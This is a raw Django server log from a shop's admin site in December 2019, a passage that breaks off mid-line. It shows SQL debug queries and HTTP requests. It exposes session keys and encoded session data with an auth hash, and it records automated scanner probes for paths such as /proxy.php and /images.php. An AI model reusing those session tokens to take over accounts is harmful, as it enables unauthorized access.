"session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:18:29.204928+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 18, 29, 204928, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:18:29] "GET /shop/category/1/change/ HTTP/1.0" 200 6949 DEBUG 2019-12-05 13:18:29,359 utils 28908 140676861576960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:18:29.346535+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 18, 29, 346535, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:18:29,364 utils 28908 140676861576960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:18:29,366 utils 28908 140676861576960 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-05 13:18:29,440 utils 28908 140676861576960 (0.002) DECLARE "_django_curs_140676861576960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:18:29,492 utils 28908 140676861576960 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:18:29.489657+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 18, 29, 489657, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:18:29] "GET /shop/category/1/change/ HTTP/1.0" 200 6949 [05/Dec/2019 13:18:29] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [05/Dec/2019 13:18:29] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 13:18:30] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 13:18:30] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 13:18:30] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 DEBUG 2019-12-05 13:18:30,103 utils 28908 140676861576960 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:18:30.091133+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 18, 30, 91133, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:18:30,108 utils 28908 140676861576960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:18:30] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:18:30] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [05/Dec/2019 13:18:30] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [05/Dec/2019 13:18:30] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 13:18:30] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 13:18:30] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 13:18:30] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 13:18:30] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 13:18:30] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 13:18:30] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [05/Dec/2019 13:18:30] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 13:18:30] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 13:18:30] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 13:18:32] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 13:18:32] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 13:18:32] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 13:20:46] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:27:13] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:32:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 13:36:22,018 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:36:22.008727+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 36, 22, 8727, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:36:22,021 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:36:22,069 utils 28908 140676850300672 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 13:36:22,076 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:36:22.074143+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 36, 22, 74143, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:36:22] "GET / HTTP/1.0" 200 6893 [05/Dec/2019 13:36:22] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [05/Dec/2019 13:36:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 13:36:22] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 13:36:22] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 13:36:23] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 13:36:23] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 13:36:23] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 13:36:23] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 13:36:23] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-05 13:36:28,305 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:36:28.291261+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 36, 28, 291261, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:36:28,309 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:36:28,315 utils 28908 140676876654336 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:36:28,317 utils 28908 140676876654336 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-05 13:36:28,324 utils 28908 140676876654336 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-05 13:36:28,498 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:36:28.496391+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 36, 28, 496391, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:36:28] "GET /shop/product/ HTTP/1.0" 200 8423 DEBUG 2019-12-05 13:36:28,781 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:36:28.768077+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 36, 28, 768077, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:36:28,785 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:36:28] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 13:36:30,533 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:36:30.524146+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 36, 30, 524146, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:36:30,536 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 13:36:30,578 utils 28908 140676876654336 (0.002) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 13:36:30,622 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T13:36:30.620177+00:00'::timestamptz WHERE "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 13, 36, 30, 620177, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') [05/Dec/2019 13:36:30] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 13:36:30,921 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T13:36:30.909146+00:00'::timestamptz AND "django_session"."session_key" = 'bqitwb1civrez1kolhip93czzgwgpjpg'); args=(datetime.datetime(2019, 12, 5, 13, 36, 30, 909146, tzinfo=), 'bqitwb1civrez1kolhip93czzgwgpjpg') DEBUG 2019-12-05 13:36:30,925 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 13:36:30] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 13:37:38] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:45:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 13:50:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 13:55:42] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:10:11] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [05/Dec/2019 14:12:14] "GET /proxy.php HTTP/1.0" 404 6629 [05/Dec/2019 14:15:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:20:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:25:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:32:36] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:37:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:42:41] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:47:44] "GET / HTTP/1.0" 302 0 [05/Dec/2019 14:55:50] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:11:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:16:45] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:21:58] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:27:01] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:32:04] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:51:32] "GET / HTTP/1.0" 302 0 [05/Dec/2019 15:58:47] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:15:02] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 16:20:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:25:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:30:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:47:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:53:59] "GET / HTTP/1.0" 302 0 [05/Dec/2019 16:57:11] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:05:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [05/Dec/2019 17:17:07] "GET /proxy.php HTTP/1.0" 404 6629 [05/Dec/2019 17:17:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:22:46] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:27:48] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:51:48] "GET / HTTP/1.0" 302 0 [05/Dec/2019 17:56:50] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:10:06] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:15:09] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:25:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:30:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:39:50] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:44:52] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:53:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 18:58:22] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:13:19] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:18:21] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:22:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 19:22:46,839 utils 28908 140676876654336 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6g8298gy9ea6h3v1n0d13sc9zxxpf4n3' LIMIT 1; args=('6g8298gy9ea6h3v1n0d13sc9zxxpf4n3',) DEBUG 2019-12-05 19:22:46,842 utils 28908 140676876654336 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6g8298gy9ea6h3v1n0d13sc9zxxpf4n3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T19:22:46.840324+00:00'::timestamptz); args=('6g8298gy9ea6h3v1n0d13sc9zxxpf4n3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 19, 22, 46, 840324, tzinfo=)) [05/Dec/2019 19:22:46] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 19:22:47] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [05/Dec/2019 19:22:47] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 19:22:47] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 19:22:47] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [05/Dec/2019 19:22:47] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 19:22:47] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 19:22:47] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 19:22:47] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 19:22:48] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /robots.txt [05/Dec/2019 19:22:51] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /robots.txt [05/Dec/2019 19:22:51] "GET /robots.txt HTTP/1.0" 404 6624 [05/Dec/2019 19:23:24] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:28:27] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:29:02] "GET / HTTP/1.0" 302 0 Not Found: /images.php [05/Dec/2019 19:33:51] "POST /images.php HTTP/1.0" 404 6624 [05/Dec/2019 19:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:47:42] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:53:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 19:58:11] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [05/Dec/2019 20:06:26] "GET /echo.php HTTP/1.0" 404 6618 [05/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:18:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 20:18:18,836 utils 28908 140676850300672 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'by8eomb7jr9zr2l1uvm8va2flcv2jbgv' LIMIT 1; args=('by8eomb7jr9zr2l1uvm8va2flcv2jbgv',) DEBUG 2019-12-05 20:18:18,838 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('by8eomb7jr9zr2l1uvm8va2flcv2jbgv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T20:18:18.837245+00:00'::timestamptz); args=('by8eomb7jr9zr2l1uvm8va2flcv2jbgv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 20, 18, 18, 837245, tzinfo=)) [05/Dec/2019 20:18:18] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:30:16] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:42:57] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:48:18] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:53:21] "GET / HTTP/1.0" 302 0 [05/Dec/2019 20:58:23] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:03:29] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:08:32] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:14:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:15:17] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:19:34] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:24:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:29:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:42:40] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:44:22] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:47:43] "GET / HTTP/1.0" 302 0 [05/Dec/2019 21:56:48] "GET / 